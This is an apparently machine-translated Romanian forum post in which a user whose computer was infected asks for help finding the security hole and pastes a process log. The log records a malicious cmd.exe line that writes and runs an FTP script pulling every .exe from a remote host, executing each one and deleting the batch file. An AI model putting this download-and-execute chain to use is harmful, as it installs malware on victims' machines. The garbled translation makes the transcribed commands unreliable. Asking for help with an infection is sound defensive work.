Ajutați-l să găsească o gaură în sistem
Acum o săptămână eram infectat cu un virus. El a venit la calculator însuși (nu am început nimic). Aparent, defecțiunea este gaura din sistem sau din software. După aceea, sistemul a fost resetat. Astăzi din nou am găsit un atac asupra calculatorului meu, dar am împiedicat infecția la timp. Ajută-mă să găsesc și să-mi pun o gaură în sistemul meu.
Tăiați din jurnalul AnVir Task Manager:
08/28 00:16:10 wmiprvse.exe 3272 a început prin svchost.exe C: \ WINDOWS \ System32 \ wbem \ wmiprvse.exe (presupunând că serviciul a lansat "Run server de procese DCOM")
08/28 00:16:38 wmiprvse.exe 1740 a început de svchost.exe NT AUTHORITY \ SYSTEM C: \ WINDOWS \ System32 \ WBEM \ wmiprvse.exe
08/28 00:16:38 msiexec.exe 1080 început de services.exe NT AUTHORITY \ SYSTEM C: \ WINDOWS \ system32 \ msiexec.exe / V
08/28 00:17:46 cmd.exe 3432 a început prin wmiprvse.exe COMP \ admin C: \ WINDOWS \ system32 \ cmd.exe / d / c md i2393cd i2393del * / f / s / qecho yBBDD.to deschis. .jajaca.com> jecho WMI >> jecho 123 >> jecho mget * .exe >> pa jecho >> jFTP.EXE -s -i: jdel jecho pentru %% I în (* .exe) nu începe %% i> D.batecho pentru %% i în (* exe) do %% i >> D.batecho del / f / q% 0% >> D.batD.bat
08/28 00:17:46 ftp.exe 2844 pornit de cmd.exe COMP \ admin C: \ WINDOWS \ system32 \ ftp.exe -i -s: j
(Deschiderea largă a gurii la plângerile firewall-ului cu privire la rularea ftp.exe-ului și scoaterea modemului 3G de la conector)
08/28 00:18:16 cmd.exe 3432 terminat, lucrat 0:29, CPU 0:00 C: \ WINDOWS \ system32 \ cmd.exe
08/28 00:18:16 ftp.exe 2844 terminat, lucrat 0:29, CPU 0:00 C: \ WINDOWS \ system32 \ ftp.exe
08/28 00:18:56 wmiprvse.exe 3272 terminat, a lucrat 02:45, CPU 0:00 C: \ WINDOWS \ System32 \ WBEM \ wmiprvse.exe
Jurnal de verificare AVZ: